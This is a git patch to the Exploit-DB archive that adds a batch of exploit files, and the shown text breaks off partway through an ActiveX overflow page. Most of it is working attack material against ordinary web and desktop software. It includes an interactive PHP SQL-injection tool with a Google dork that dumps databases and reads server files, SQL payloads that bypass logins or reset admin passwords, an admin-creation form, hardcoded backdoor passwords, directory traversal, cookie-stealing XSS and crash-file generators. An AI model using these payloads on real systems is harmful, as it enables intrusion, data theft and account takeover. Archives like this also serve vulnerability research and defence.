From 8198dd43d5de65dfc9c08e74e707840ff07d446d Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Fri, 10 Jan 2014 04:25:18 +0000
Subject: [PATCH] Updated 01_10_2014

---
 files.csv                           |  19 ++
 platforms/asp/webapps/30793.txt     |  11 +
 platforms/asp/webapps/30794.txt     |  11 +
 platforms/asp/webapps/30796.txt     |   7 +
 platforms/asp/webapps/30798.txt     |   9 +
 platforms/asp/webapps/30800.html    |   7 +
 platforms/cgi/webapps/30795.txt     |   8 +
 platforms/php/webapps/30689.php     | 179 ++++++++++++++
 platforms/php/webapps/30786.txt     |  37 +++
 platforms/php/webapps/30792.html    |   9 +
 platforms/php/webapps/30799.txt     |   7 +
 platforms/php/webapps/30801.txt     |  12 +
 platforms/php/webapps/30803.txt     |  10 +
 platforms/php/webapps/30804.txt     |   9 +
 platforms/windows/dos/30550.php     |  45 ++++
 platforms/windows/dos/30797.html    |  29 +++
 platforms/windows/dos/30805.html    |  30 +++
 platforms/windows/local/30783.py    |  50 ++++
 platforms/windows/local/30802.c     | 365 ++++++++++++++++++++++++++++
 platforms/windows/webapps/30669.txt | 138 +++++++++++
 20 files changed, 992 insertions(+)
 create mode 100755 platforms/asp/webapps/30793.txt
 create mode 100755 platforms/asp/webapps/30794.txt
 create mode 100755 platforms/asp/webapps/30796.txt
 create mode 100755 platforms/asp/webapps/30798.txt
 create mode 100755 platforms/asp/webapps/30800.html
 create mode 100755 platforms/cgi/webapps/30795.txt
 create mode 100755 platforms/php/webapps/30689.php
 create mode 100755 platforms/php/webapps/30786.txt
 create mode 100755 platforms/php/webapps/30792.html
 create mode 100755 platforms/php/webapps/30799.txt
 create mode 100755 platforms/php/webapps/30801.txt
 create mode 100755 platforms/php/webapps/30803.txt
 create mode 100755 platforms/php/webapps/30804.txt
 create mode 100755 platforms/windows/dos/30550.php
 create mode 100755 platforms/windows/dos/30797.html
 create mode 100755 platforms/windows/dos/30805.html
 create mode 100755 platforms/windows/local/30783.py
 create mode 100755 platforms/windows/local/30802.c
 create mode 100755 platforms/windows/webapps/30669.txt

diff --git a/files.csv b/files.csv
index 2639f8f01..85c303e1a 100755
--- a/files.csv
+++ b/files.csv
@@ -27404,6 +27404,7 @@ id,file,description,date,author,platform,type,port
 30545,platforms/asp/webapps/30545.txt,"Absolute Poll Manager XE 4.1 xlaapmview.asp Cross Site Scripting Vulnerability",2007-08-30,"Richard Brain",asp,webapps,0
 30546,platforms/windows/local/30546.txt,"Multiple MicroWorld eScan Products Local Privilege Escalation Vulnerability",2007-08-30,"Edi Strosar",windows,local,0
 30547,platforms/hardware/webapps/30547.txt,"D-Link DSL-2750U ME_1.09 - CSRF Vulnerability",2013-12-28,"FIGHTERx war",hardware,webapps,0
+30550,platforms/windows/dos/30550.php,"Ofilter Player 1.1 - (.wav) Integer Division by Zero",2013-12-28,"Osanda Malith",windows,dos,0
 30553,platforms/php/webapps/30553.txt,"Toms Gästebuch 1.00 form.php Multiple Parameter XSS",2007-09-07,cod3in,php,webapps,0
 30554,platforms/php/webapps/30554.txt,"Toms Gästebuch 1.00 admin/header.php Multiple Parameter XSS",2007-09-07,cod3in,php,webapps,0
 30555,platforms/php/webapps/30555.txt,"MKPortal 1.0/1.1 Admin.PHP Authentication Bypass Vulnerability",2007-09-03,Demential,php,webapps,0
@@ -27519,6 +27520,7 @@ id,file,description,date,author,platform,type,port
 30666,platforms/multiple/local/30666.txt,"ACE Stream Media 2.1 - (acestream://) Format String Exploit PoC",2014-01-03,LiquidWorm,multiple,local,0
 30667,platforms/hardware/webapps/30667.txt,"Technicolor TC7200 - Multiple CSRF Vulnerabilities",2014-01-03,"Jeroen - IT Nerdbox",hardware,webapps,0
 30668,platforms/hardware/webapps/30668.txt,"Technicolor TC7200 - Multiple XSS Vulnerabilities",2014-01-03,"Jeroen - IT Nerdbox",hardware,webapps,0
+30669,platforms/windows/webapps/30669.txt,"DirectControlTM Version 3.1.7.0 - Multiple Vulnerabilties",2014-01-03,"mohamad ch",windows,webapps,0
 30672,platforms/windows/dos/30672.txt,"Live for Speed Skin Name Buffer Overflow Vulnerability",2007-10-13,"Luigi Auriemma",windows,dos,0
 30673,platforms/hardware/remote/30673.txt,"NETGEAR SSL312 PROSAFE SSL VPN-Concentrator 25 Error Page Cross Site Scripting Vulnerability",2007-10-15,SkyOut,hardware,remote,0
 30674,platforms/java/webapps/30674.txt,"Stringbeans Portal 3.2 Projects Script Cross-Site Scripting Vulnerability",2007-10-15,JosS,java,webapps,0
@@ -27534,6 +27536,7 @@ id,file,description,date,author,platform,type,port
 30684,platforms/php/webapps/30684.txt,"SiteBar <= 3.3.8 integrator.php lang Parameter XSS",2007-10-18,"Robert Buchholz",php,webapps,0
 30685,platforms/php/webapps/30685.txt,"SiteBar <= 3.3.8 index.php target Parameter XSS",2007-10-18,"Robert Buchholz",php,webapps,0
 30686,platforms/php/webapps/30686.txt,"SiteBar <= 3.3.8 command.php Modify User Action uid Parameter XSS",2007-10-18,"Robert Buchholz",php,webapps,0
+30689,platforms/php/webapps/30689.php,"Taboada Macronews <= 1.0 - SQLi Exploit",2014-01-04,Jefrey,php,webapps,0
 30691,platforms/php/webapps/30691.txt,"Alacate-Lucent OmniVista 4760 Multiple Cross Site Scripting Vulnerabilities",2007-10-18,"Miguel Angel",php,webapps,0
 30692,platforms/windows/remote/30692.js,"RealPlayer 10.0/10.5/11 ierpplug.dll ActiveX Control Import Playlist Name Stack Buffer Overflow Vulnerability",2007-10-18,anonymous,windows,remote,0
 30693,platforms/php/webapps/30693.txt,"SocketKB 1.1.5 Multiple Cross-Site Scripting Vulnerabilities",2007-10-19,"Ivan Sanchez",php,webapps,0
@@ -27617,7 +27620,23 @@ id,file,description,date,author,platform,type,port
 30778,platforms/asp/webapps/30778.txt,"Click&BaneX Details.ASP SQL Injection Vulnerability",2007-11-19,"Aria-Security Team",asp,webapps,0
 30780,platforms/linux/local/30780.txt,"ISPmanager 4.2.15 Responder Local Privilege Escalation Vulnerability",2007-11-20,"Andrew Christensen",linux,local,0
 30781,platforms/osx/remote/30781.txt,"Apple Mac OS X 10.5.x Mail Arbitrary Code Execution Vulnerability",2007-11-20,"heise Security",osx,remote,0
+30783,platforms/windows/local/30783.py,"CCProxy 7.3 - Integer Overflow Exploit",2014-01-07,Mr.XHat,windows,local,0
+30786,platforms/php/webapps/30786.txt,"Middle School Homework Page 1.3 Beta 1 - Multiple Vulnerabilities",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,80
 30787,platforms/php/remote/30787.rb,"vTiger CRM SOAP AddEmailAttachment Arbitrary File Upload",2014-01-07,metasploit,php,remote,80
 30788,platforms/windows/local/30788.rb,"IcoFX Stack Buffer Overflow",2014-01-07,metasploit,windows,local,0
 30789,platforms/windows/local/30789.rb,"IBM Forms Viewer Unicode Buffer Overflow",2014-01-07,metasploit,windows,local,0
 30790,platforms/php/webapps/30790.txt,"Cubic CMS - Multiple Vulnerabilities",2014-01-07,"Eugenio Delfa",php,webapps,80
+30792,platforms/php/webapps/30792.html,"Underground CMS 1.x Search.Cache.Inc.PHP Backdoor Vulnerability",2007-11-21,D4m14n,php,webapps,0
+30793,platforms/asp/webapps/30793.txt,"VUNET Mass Mailer 'default.asp' SQL Injection Vulnerability",2007-11-21,"Aria-Security Team",asp,webapps,0
+30794,platforms/asp/webapps/30794.txt,"VUNET Case Manager 3.4 'default.asp' SQL Injection Vulnerability",2007-11-21,The-0utl4w,asp,webapps,0
+30795,platforms/cgi/webapps/30795.txt,"GWExtranet Multiple Directory Traversal Vulnerabilities",2007-11-21,joseph.giron13,cgi,webapps,0
+30796,platforms/asp/webapps/30796.txt,"E-vanced Solutions E-vents 5.0 Multiple Input Validation Vulnerabilities",2007-11-21,joseph.giron13,asp,webapps,0
+30797,platforms/windows/dos/30797.html,"Aurigma Image Uploader 4.x ActiveX Control Multiple Remote Stack Buffer Overflow Vulnerabilities",2007-11-22,"Elazar Broad",windows,dos,0
+30798,platforms/asp/webapps/30798.txt,"NetAuctionHelp 4.1 Search.ASP SQL Injection Vulnerability",2007-11-22,"Aria-Security Team",asp,webapps,0
+30799,platforms/php/webapps/30799.txt,"MySpace Scripts Poll Creator Index.PHP HTML Injection Vulnerability",2007-11-22,Doz,php,webapps,0
+30800,platforms/asp/webapps/30800.html,"FooSun Api_Response.ASP SQL Injection Vulnerability",2007-11-23,flyh4t,asp,webapps,0
+30801,platforms/php/webapps/30801.txt,"Bandersnatch 0.4 Index.PHP Multiple Cross-Site Scripting Vulnerabilities",2007-11-23,"Tim Brown",php,webapps,0
+30802,platforms/windows/local/30802.c,"VMware Tools 3.1 HGFS.Sys Local Privilege Escalation Vulnerability",2007-11-24,SoBeIt,windows,local,0
+30803,platforms/php/webapps/30803.txt,"CoolShot E-Lite POS 1.0 Login SQL Injection Vulnerability",2007-11-24,"Aria-Security Team",php,webapps,0
+30804,platforms/php/webapps/30804.txt,"VBTube 1.1 Search Cross Site Scripting Vulnerability",2007-11-24,Crackers_Child,php,webapps,0
+30805,platforms/windows/dos/30805.html,"RichFX Basic Player 1.1 ActiveX Control Multiple Buffer Overflow Vulnerabilities",2007-11-25,"Elazar Broad",windows,dos,0
diff --git a/platforms/asp/webapps/30793.txt b/platforms/asp/webapps/30793.txt
new file mode 100755
index 000000000..562f70012
--- /dev/null
+++ b/platforms/asp/webapps/30793.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/26522/info
+
+Mass Mailer is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+The following proof-of-concept example is available:
+
+Login Page (Default.asp)
+
+Password: anything' OR 'x'='x 
\ No newline at end of file
diff --git a/platforms/asp/webapps/30794.txt b/platforms/asp/webapps/30794.txt
new file mode 100755
index 000000000..6317903aa
--- /dev/null
+++ b/platforms/asp/webapps/30794.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/26523/info
+
+VUNET Case Manager is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+VUNET Case Manager 3.4 is vulnerable; other versions may also be affected.
+
+The following example password is available for the 'Login' page ('Default.asp'):
+
+Password: anything' OR 'x'='x 
\ No newline at end of file
diff --git a/platforms/asp/webapps/30796.txt b/platforms/asp/webapps/30796.txt
new file mode 100755
index 000000000..008d79f44
--- /dev/null
+++ b/platforms/asp/webapps/30796.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/26526/info
+
+E-vanced Solutions E-vents is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/eventsignup.asp?ID=4197 UNION ALL SELECT username, etc FROM users-- 
\ No newline at end of file
diff --git a/platforms/asp/webapps/30798.txt b/platforms/asp/webapps/30798.txt
new file mode 100755
index 000000000..6fd6c2507
--- /dev/null
+++ b/platforms/asp/webapps/30798.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/26540/info
+
+NetAuctionHelp is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+NetAuctionHelp 4.1 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/search.asp?sort=ni&category=&categoryname=&kwsearch=&nsearch=[SQL INJECTION] http://www.example.com/search.asp?sort=ni&category=&categoryname=&kwsearch=&nsearch='having 1=1-- http://www.example.com/search.asp?sort=ni&category=&categoryname=&kwsearch=&nsearch=1' or 1=convert(int,@@servername)-- http://www.example.com/search.asp?sort=ni&category=&categoryname=&kwsearch=&nsearch=1' or 1=convert(int,@@version)-- http://www.example.com/itemdtl.asp?id=1-1' UPDATE tblAd set descr= 'HACKED' Where(ID= '1');-- 
\ No newline at end of file
diff --git a/platforms/asp/webapps/30800.html b/platforms/asp/webapps/30800.html
new file mode 100755
index 000000000..84e85fd94
--- /dev/null
+++ b/platforms/asp/webapps/30800.html
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/26552/info
+
+FooSun is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML><HEAD><TITLE>foosun create new admin exp Codz By flyh4t</TITLE> <META http-equiv=Content-Type content="text/html; charset=gb2312"> <META content="MSHTML 6.00.2800.1479" name=GENERATOR></HEAD> <BODY style="FONT-SIZE: 9pt">------------------------ foosun create new admin exp Codz By flyh4t --------------------------- <FORM name=frm method=post target=_blank>foosun path: <INPUT style="BORDER-RIGHT: 1px solid; BORDER-TOP: 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: 1px solid; BORDER-BOTTOM: 1px solid" size=65 value=http://demo.foosun.net name=act><br> <INPUT type="hidden" style="BORDER-RIGHT: 1px solid; BORDER-TOP: 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: 1px solid; BORDER-BOTTOM: 1px solid" size=65 value=/api/Api_response.asp?syskey=8076ac99d47feeb6&password=flyh4t&SaveCookie=1&UserName=flyh4t';insert%20into%20FS_MF_Admin%20(Admin_Name,Admin_Pass_Word,Admin_Is_Super)values(0x6F006C0064006A0075006E00,0x3800330061006100340030003000610066003400360034006300370036006400,1)-- name=sql><br> <INPUT onclick="Javascipt:frm.action=document.all.act.value+document.all.sql.value; frm. submit();" type=button value=". ." name=Send></FORM> Hey boy, fun the game... <br> It is just a exp for the bug of foosun...<br> can create a new admin oldjun/12345678...<br> </BODY> </HTML> 
\ No newline at end of file
diff --git a/platforms/cgi/webapps/30795.txt b/platforms/cgi/webapps/30795.txt
new file mode 100755
index 000000000..a29a68fa3
--- /dev/null
+++ b/platforms/cgi/webapps/30795.txt
@@ -0,0 +1,8 @@
+source: http://www.securityfocus.com/bid/26525/info
+
+GWExtranet is prone to multiple directory-traversal vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to retrieve arbitrary files from the vulnerable system in the context of the webserver process. Information obtained may aid in further attacks. 
+
+http://www.example.com/gwextranet/scp.dll/sendto?user=calendar+of+events&mid=474020FA.GWEMAIL_DEPOT.SDEPO.100.167656B.1.1B00.1&template=.././../../boot.ini%00
+http://www.example.com/gwextranet/scp.dll/nbfile?user=calendar%20of%20events&format=&mid=46FA2724.GWEMAIL_DEPOT.SDEPO.100.167656B.1.198E.1&folder=Calendar&altcolor=cccccc&template=gwextra&caldays=1&startday=&file=../scp.dll 
\ No newline at end of file
diff --git a/platforms/php/webapps/30689.php b/platforms/php/webapps/30689.php
new file mode 100755
index 000000000..c8ed49312
--- /dev/null
+++ b/platforms/php/webapps/30689.php
@@ -0,0 +1,179 @@
+<?php
+/*
+# Exploit Title: Taboada Macronews <= 1.0 SQLi Exploit
+# Date: 03rd January 2013
+# Exploit Author: WhiteCollarGroup
+# Software Link: http://www.scriptbrasil.com.br/download/codigo/7144/
+# Version: 1.0
+# Google Dork: intext:"Powered by: joaotaboada.com"
+
+Usage:
+    php filename.php
+*/
+
+function puts($str) {
+    echo $str."\n";
+}
+ 
+function gets() {
+    return trim(fgets(STDIN));
+}
+  
+function hex($string){
+    $hex=''; // PHP 'Dim' =]
+    for ($i=0; $i < strlen($string); $i++){
+        $hex .= dechex(ord($string[$i]));
+    }
+    return '0x'.$hex;
+}
+ 
+$token = uniqid();
+$token_hex = hex($token);
+ 
+puts("Taboada Macronews <= 1.0 SQL Injection Exploit");
+puts("By WhiteCollarGroup (0KaL miss all of you guys)");
+ 
+puts("[?] Enter website URL (e. g.: http://www.target.com/taboada/):");
+$target = gets();
+ 
+puts("[*] Checking...");
+if(!@file_get_contents($target)) die("[!] Access error: check domain and path.");
+ puts("[.] Connected.");
+if(substr($target, (strlen($target)-1))!="/") $target .= "/";
+ 
+function runquery($query) {
+    global $target,$token,$token_hex;
+     
+    $query = preg_replace("/;$/", null, $query);
+     
+    $query = urlencode($query);
+    $rodar = $target . "news_popup.php?id='%20UNION%20ALL%20SELECT%201,2,3,concat($token_hex,%28$query%29,$token_hex),5,6,7,8--%20";
+//    die($rodar);
+    $get = file_get_contents($rodar);
+    $matches = array();
+    preg_match_all("/$token(.*)$token/", $get, $matches);
+    if(isset($matches[1][0]))
+        return $matches[1][0];
+    else
+        return false;
+}
+ 
+if(runquery("SELECT $token_hex")!=$token) {
+    puts("[!] Couldn't get data");
+    exit;
+}
+
+puts("[i] MySQL version is ".runquery("SELECT version()"));
+puts("[i] MySQL user is ".runquery("SELECT user()"));
+ 
+function main($msg=null) {
+    global $token,$token_hex;
+     
+    echo "\n".$msg."\n";
+    puts("[>] MAIN MENU");
+    puts("[1] Browse MySQL");
+    puts("[2] Run SQL Query");
+    puts("[3] Read file");
+    puts("[4] About");
+    puts("[0] Exit");
+    $resp = gets();
+ 
+    if($resp=="0")
+        exit;
+    elseif($resp=="1") {
+         
+        // pega dbs
+        $i = 0;
+        puts("[.] Getting databases:");
+        while(true) {
+            $pega = runquery("SELECT schema_name FROM information_schema.schemata LIMIT $i,1");
+            if($pega)
+                puts(" - ".$pega);
+            else
+                break;
+                 
+            $i++;
+        }
+         
+        puts("[!] Current database: ".runquery("SELECT database()"));
+        puts("[?] Enter database name for select:");
+        $own = array();
+        $own['db'] = gets();
+        $own['dbh'] = hex($own['db']);
+         
+        // pega tables da db
+        $i = 0;
+        puts("[.] Getting tables from $own[db]:");
+        while(true) {
+            $pega = runquery("SELECT table_name FROM information_schema.tables WHERE table_schema=$own[dbh] LIMIT $i,1");
+            if($pega)
+                puts(" - ".$pega);
+            else
+                break;
+                 
+            $i++;
+        }
+        puts("[?] Enter table name for select:");
+        $own['tb'] = gets();
+        $own['tbh'] = hex($own['tb']);
+         
+        // pega colunas da table
+        $i = 0;
+        puts("[.] Getting columns from $own[db].$own[tb]:");
+        while(true) {
+            $pega = runquery("SELECT column_name FROM information_schema.columns WHERE table_schema=$own[dbh] AND table_name=$own[tbh] LIMIT $i,1");
+            if($pega)
+                puts(" - ".$pega);
+            else
+                break;
+                 
+            $i++;
+        }
+        puts("[?] Enter columns name, separated by commas (\",\") for select:");
+        $own['cl'] = explode(",", gets());
+         
+        // pega dados das colunas
+         
+        foreach($own['cl'] as $coluna) {
+            $i = 0;
+            puts("[=] Column: $coluna");
+            while(true) {
+                $pega = runquery("SELECT $coluna FROM $own[db].$own[tb] LIMIT $i,1");
+                if($pega) {
+                    puts(" - $pega");
+                    $i++;
+                } else
+                    break;
+            }
+             
+            echo "\n[ ] -+-\n";
+        }
+         
+        main();
+         
+    } elseif($resp=="2") {
+        puts("[~] RUN SQL QUERY");
+        puts("[!] You can run a SQL code. It can returns a one-line and one-column content. You can also use concat() or group_concat().");
+        puts("[?] Query (enter for exit): ");
+        $query = gets();
+        if(!$query) main();
+        else main(runquery($query."\n"));
+    } elseif($resp=="3") {
+        puts("[?] File path (may not have priv):");
+        $file = hex(gets());
+        $le = runquery("SELECT load_file($file) AS wc");
+        if($le)
+            main($le);
+        else
+            main("File not found, empty or no priv!");
+             
+    } elseif($resp=="4") {
+        puts("Coded by 0KaL @ WhiteCollarGroup");
+        puts("tinyurl.com/WCollarGroup");
+        main();
+    }
+    else
+        main("[!] Wrong choice.");
+}
+ 
+main();
\ No newline at end of file
diff --git a/platforms/php/webapps/30786.txt b/platforms/php/webapps/30786.txt
new file mode 100755
index 000000000..1d18d95e4
--- /dev/null
+++ b/platforms/php/webapps/30786.txt
@@ -0,0 +1,37 @@
+Middle School Homework Page V1.3 Beta 1  - Multiple Vulnerabilties
+===================================================================
+
+####################################################################
+.:. Author         : AtT4CKxT3rR0r1ST
+.:. Contact        : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com]
+.:. Home           : http://www.iphobos.com/blog/
+.:. Script         : http://sourceforge.net/projects/mshwpage/
+####################################################################
+
+I. Sql Injection
+
+##############
+VULNERABILITY
+##############
+/view.php (line 3-4)
+-----------------------------------------------------------------------------
+
+<h2>Homework for <?php get_array("select * from class where
+classID=$_REQUEST[class]", 'classDesc') ?> as of <?php $today = date("M j
+G:i:s T Y");echo $today; ?>:</h2>
+<?php
+
+-----------------------------------------------------------------------------
+
+#########
+EXPLOIT
+#########
+(
+localhost/mshwpage/view.php?class=null+and+1=2+union+select+1,concat(name,0x3a,pass)+from+teachinfo
+
+
+II. Cross Site Scripting
+
+localhost/mshwpage/view.php?class=<script>alert(document.cookie);</script>
+
+####################################################################
diff --git a/platforms/php/webapps/30792.html b/platforms/php/webapps/30792.html
new file mode 100755
index 000000000..8fea2f7f8
--- /dev/null
+++ b/platforms/php/webapps/30792.html
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/26521/info
+
+Underground CMS is prone to a backdoor vulnerability.
+
+Attackers can exploit this issue to gain unauthorized access to the application. Successful attacks will compromise the affected application and possibly the underlying webserver.
+
+Underground CMS 1.4, 1.7, and 1.8 are vulnerable; other versions may also be affected. 
+
+<head> <title>Ucms v. 1.8 Np exploit</title> <script type="text/javascript"> function sethost(seite) { document.host.action = seite + 'index.php?&q=test&e=1'; document.all.data.innerHTML = document.host.action; } </script> </head> <body onLoad="sethost('http://www.example.com/')" > <h1>Ucms v. 1.8 Np exploit</h1> Actual Request:<div id="data"></div> <br /> Host:<input type="text" value="http://www.ucmspage.de/" onKeyUp="sethost(this.value);" /> <form id="host" name="host" action="http://www.ucmspage.de/" method="POST"> Password:<input type="text" name="p" value="ZCShY8FjtEhIF8LZ"><br /> <!-- Additional info: You need a password to activate the backdoor we found these passwords: ZCShY8FjtEhIF8LZ (UCMS 1.8) mYM1NHtWtZk2KwrF (UCMS 1.4) wVCQUyhTga5Nmft1 (UCMS [?]) Just go into the file or similar files to find the passwords, for every version there is another password --> Phpcode:<br /> <textarea name="e" rows="20" cols="100"> phpinfo(); ?> &lt;/textarea&gt; <br /> <input type="submit" value="exploit"> </form> </body> <!-- It?s just a crime to do such thigs, so please use this exploit just for knowledge and not to destroy the warez pages... thank you for you attention... Have a nice day --> </html> 
\ No newline at end of file
diff --git a/platforms/php/webapps/30799.txt b/platforms/php/webapps/30799.txt
new file mode 100755
index 000000000..77a965339
--- /dev/null
+++ b/platforms/php/webapps/30799.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/26544/info
+
+MySpace Scripts Poll Creator is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing an attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible. 
+
+http://www.example.com/poll/index.php?action=create_new 
\ No newline at end of file
diff --git a/platforms/php/webapps/30801.txt b/platforms/php/webapps/30801.txt
new file mode 100755
index 000000000..16325c76c
--- /dev/null
+++ b/platforms/php/webapps/30801.txt
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/26553/info
+
+Bandersnatch is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Bandersnatch 0.4 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/path/to/index.php?func=[injectionpoint]
+http://www.example.com/path/to/index.php?date=[injectionpoint]
+http://www.example.com/path/to/index.php?func=log&jid=[injectionpoint]
+http://www.example.com/path/to/index.php?func=user&jid=[injectionpoint] 
\ No newline at end of file
diff --git a/platforms/php/webapps/30803.txt b/platforms/php/webapps/30803.txt
new file mode 100755
index 000000000..4e04b374d
--- /dev/null
+++ b/platforms/php/webapps/30803.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/26558/info
+
+E-lite POS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+This issue affects E-Lite POS 1.0; other versions may also be vulnerable. 
+
+-1' UPDATE users set user_name= 'admin' Where(user_iD= '1');--
+-1' UPDATE users set user_pw= 'hacked' Where(user_iD= '1');-- 
\ No newline at end of file
diff --git a/platforms/php/webapps/30804.txt b/platforms/php/webapps/30804.txt
new file mode 100755
index 000000000..4aa306c62
--- /dev/null
+++ b/platforms/php/webapps/30804.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/26566/info
+
+VBTube is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting this issue allows attackers to execute arbitrary HTML or script code in a user's browser session in the context of an affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+This issue affects VBTube 1.1; other versions may also be vulnerable. 
+
+http://www.example.com/vBTube.php?do=search&search=<script>alert(document.cookie)</script> 
\ No newline at end of file
diff --git a/platforms/windows/dos/30550.php b/platforms/windows/dos/30550.php
new file mode 100755
index 000000000..b20bd7f82
--- /dev/null
+++ b/platforms/windows/dos/30550.php
@@ -0,0 +1,45 @@
+<?php
+/*
+*Title: Ofilter Player 1.1 (.wav) Integer Division by Zero
+*Version: 1.1
+*Tested on: Windows XP SP2 en
+*Vendor: http://www.008soft.com/
+*Software Link: http://www.008soft.com/downloads_OfilterPlayer.exe
+*E-Mail: OsandaJayathissa@gmail.com
+*Bug Discovered by: Osanda Malith 
+*Twitter: @OsandaMalith
+* /!\ Author is not responsible for any damage you cause
+* This POC is for educational purposes only
+*/
+$poc=
+"\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01".
+"\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E".
+"\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22".
+"\x40\x4f\x73\x61\x6e\x64\x61\x4d\x61\x6c\x69\x74\x68\x00\x00\x00".
+"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x74\x41\x41\x41\x41\x41\x41".
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
+"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41";
+
+file_put_contents("ofilterplayer.wav", $poc);
+print <<< str
+[+] Ofilter Player 1.1 Integer Division by Zero
+[+] by Osanda Malith (@OsandaMalith)
+[~] File Created "ofilterplayer.wav"
+str;
+?>
\ No newline at end of file
diff --git a/platforms/windows/dos/30797.html b/platforms/windows/dos/30797.html
new file mode 100755
index 000000000..24fbc5a19
--- /dev/null
+++ b/platforms/windows/dos/30797.html
@@ -0,0 +1,29 @@
+source: http://www.securityfocus.com/bid/26537/info
+
+Aurigma Image Uploader ActiveX control is prone to multiple stack-based buffer-overflow vulnerabilities because it fails to perform adequate boundary checks on user-supplied data.
+
+Successfully exploiting these issues allows remote attackers to execute arbitrary code in the context of the application using the ActiveX control (typically Internet Explorer). Failed exploit attempts likely result in denial-of-service conditions.
+
+Versions prior to Aurigma Image Uploader 4.5.70 are affected.
+
+UPDATE (November 26, 2007): Reports indicate that this issue occurs because of a buffer-overflow issue that affects a Win32API method. This has not been confirmed. We will update this BID as more information emerges. 
+
+<html>
+ <head>
+  <script language="JavaScript" DEFER>
+    function Check() {
+    var s = "AAAA";
+
+     while (s.length < 999999) s=s+s;
+
+     var obj = new ActiveXObject("Aurigma.ImageUploader.4.1"); //{6E5E167B-1566-4316-B27F-0DDAB3484CF7}
+      obj.GotoFolder(s);
+      obj.CanGotoFolder(s);
